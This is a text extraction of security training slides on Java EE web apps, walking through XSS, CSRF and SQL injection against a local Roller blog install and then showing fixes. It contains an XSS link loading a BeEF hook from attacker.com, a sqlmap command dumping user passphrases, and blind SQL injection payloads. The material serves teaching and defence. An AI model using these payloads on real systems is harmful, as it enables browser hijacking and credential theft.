securing java ee web apps

Securing Java EE Web AppsFrank KimPrincipal, ThinkSecAuthor, SANS Institute

AboutAbout

• Frank Kim– Consultant, ThinkSec

– Author, SANS Secure Coding in Java/JEE

– SANS Application Security Curriculum Lead

What You Should KnowWhat You Should Know

• Hacking is not hard• Don’t trust any data

– Assume that your users are evil!

OutlineOutline

• Web App Attack Refresher–XSS, CSRF, SQL Injection

• Testing–Hacking an open source app

• Secure Coding–Fixing security bugs

Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)

• Occurs when unvalidated data is displayed back to the browser

• Types of XSS– Stored

– Reflected

– Document Object Model (DOM) based

Cross-Site Request Forgery (CSRF)Cross-Site Request Forgery (CSRF)

SQL Injection (SQLi)SQL Injection (SQLi)

• Occurs when dynamic SQL queries are used– By injecting arbitrary SQL commands, attackers can

extend the meaning of the original query

– Can potentially execute any SQL statement on the database

• Very powerful– #1 on CWE/SANS Top 25 Most Dangerous Software

Errors

– #1 on OWASP Top 10

OutlineOutline

• Web App Attack Refresher–XSS, CSRF, SQL Injection

• Testing–Hacking an open source app

• Secure Coding–Fixing security bugs

What are We Testing?What are We Testing?

• Installation of Roller 3.0

• Fake install of SANS AppSec Street Fighter Blog

• Want to simulate the actions that a real attacker might take– There are definitely other avenues of attack

– We're walking through one attack scenario

Attack ScenarioAttack Scenario

1) XSS to control the victim's browser

2) Combine XSS and CSRF to conduct a privilege escalation attack

- Use escalated privileges to access another feature

3) Use SQL Injection to access the database directly

Spot the Vuln - XSSSpot the Vuln - XSS

XSS in head.jspXSS in head.jsp

Testing the "look" ParamTesting the "look" Param

• Admin pages include head.jsp• The param is persistent for the session

XSS ExploitationXSS Exploitation

• Introducing BeEF– Browser Exploitation Framework

– http://www.bindshell.net/tools/beef

• Uses XSS to hook the victim's browser– Log user keystrokes, view browsing history,

execute JavaScript, etc

– Advanced attacks - Metasploit integration, browser exploits, etc

XSS Exploitation OverviewXSS Exploitation Overview

15

Victim

1) Sends link with evil BeEF script

http://localhost:8080/roller/roller-ui/yourWebsites.do?look="><script src="http://www.attacker.com/beef/hook/beefmagic.js.php"></script>

2) Victim clicks evil link

3) Victim's browser sends data to attacker

Attacker

BeEF XSS DemoBeEF XSS Demo

Spot the Vuln - CSRFSpot the Vuln - CSRF

CSRF in UserAdmin.jspCSRF in UserAdmin.jsp

Want to use CSRF to

change this field

CSRF DemoCSRF Demo

Spot the Vuln – SQL InjectionSpot the Vuln – SQL Injection

SQL Injection in UserServletSQL Injection in UserServlet

SQL Injection TestingSQL Injection Testing

• UserServlet is vulnerable to SQLihttp://localhost:8080/roller/roller-ui/authoring/user

No results

Exploiting SQL InjectionExploiting SQL Injection

• Introducing sqlmap–http://sqlmap.sourceforge.net

• Tool that automates detection and exploitation of SQL Injection vulns–Supports MySQL, Oracle, PostgreSQL, MS SQL Server

–Supports blind, inband, and batch queries

–Fingerprint/enumeration - dump db schemas, tables/column names, data, db users, etc

–Takeover features - read/upload files, exec arbitrary commands, exec Metasploit shellcode, etc

sqlmap Syntaxsqlmap Syntax

Dump userids and passwordspython sqlmap.py -u

"http://localhost:8080/roller/roller-ui/authoring/user?startsWith=f%25"

--cookie "username=test; JSESSIONID==<INSERT HERE>" --drop-set-cookie -p startsWith --dump -T rolleruser -C username,passphrase -v 2

SQL Injection Demo

SQL Injection Demo

How it WorksHow it Works

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 103 AND 'neEy' LIKE 'neEy

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 104 AND 'neEy' LIKE 'neEy

f%' AND ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1)) > 105 AND 'neEy' LIKE 'neEy

Step By Step [0]Step By Step [0]

SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1;

returns ilovethetajmahal

Step By Step [1]Step By Step [1]

select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1);

returns i

select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1);

returns l

select MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1);

returns o

Step By Step [2]Step By Step [2]

select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 1, 1));

returns 105

select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 2, 1));

returns 108

select ORD(MID((SELECT IFNULL(CAST(passphrase AS CHAR(10000)), CHAR(32)) FROM roller.rolleruser LIMIT 2, 1), 3, 1));

returns 111

Attack SummaryAttack Summary

1) XSS to control the victim's browser

2) Combine XSS and CSRF to conduct a privilege escalation attack

- Use escalated privileges to access another feature

3) Use SQL Injection to access the database directly

OutlineOutline

• Web App Attack Refresher–XSS, CSRF, SQL Injection

• Testing–Hacking an open source app

• Secure Coding–Fixing security bugs

Application

Should I be consuming this?

Should I be emitting this?

Data ValidationData Validation

Inbound Data

Outbound Data

Data Store

Validation

Encoding

Encoding

Validation

Outbound Data

Inbound Data

Validation

Output EncodingOutput Encoding

• Encoding– Convert characters so they are treated as data

and not special characters

• Must escape differently depending where data is displayed on the page

• XSS Prevention Cheat Sheethttp://www.owasp.org/index.php/

XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

Fix XSS in head.jspFix XSS in head.jsp

• Add URL encoding<link rel="stylesheet" type="text/css" media="all" href="<%= request.getContextPath() %>/roller-ui/theme/<%= ESAPI.encoder().encodeForURL(theme) %>/colors.css" />

Fix CSRFFix CSRF

• UserAdmin.jsp– Add anti-CSRF token

<input type="hidden" name=<%= CSRFTokenUtil.SESSION_ATTR_KEY %> value=<%= CSRFTokenUtil.getToken(request.getSession(false)) %> >

• UserAdminAction.java– Check anti-CSRF tokenif (!CSRFTokenUtil.isValid(req.getSession(false), req)){

return mapping.findForward("error");

}

Fix SQL InjectionFix SQL Injection

• Use parameterized queries correctlyif (startsWith == null || startsWith.equals("")) {

query = "SELECT username, emailaddress FROM rolleruser";

stmt = con.prepareStatement(query);

} else {

query = "SELECT username, emailaddress FROM rolleruser WHERE username like ? or emailaddress like ?";

stmt = con.prepareStatement(query);

stmt.setString(1, startsWith + "%");

stmt.setString(2, startsWith + "%");

}

rs = stmt.executeQuery();

Building Secure SoftwareBuilding Secure Software

Source: Microsoft SDL

RememberRemember

• Hacking is not hard• Don’t trust any data

–Validate input• Prefer whitelists

• Use authenticity token

–Encode output• Contextual encoding

• Use parameterized queries

SANS Software SecuritySANS Software Security

• SANS AppSec 2012- April 30 - May 1 in Las Vegas- CFP is open now!- http://sans.org/appsec-2012

• New courses- DEV551 Secure iOS Development- DEV568 Secure Android Development

• Free resources- Top 25, blog, white papers, webcasts, and more at- http://software-security.sans.org

• Discount- Save 10% using the discount code DEVOXX. Enterprise pricing avail.

Thanks!Thanks!

Frank Kimfrank@thinksec.com @sansappsec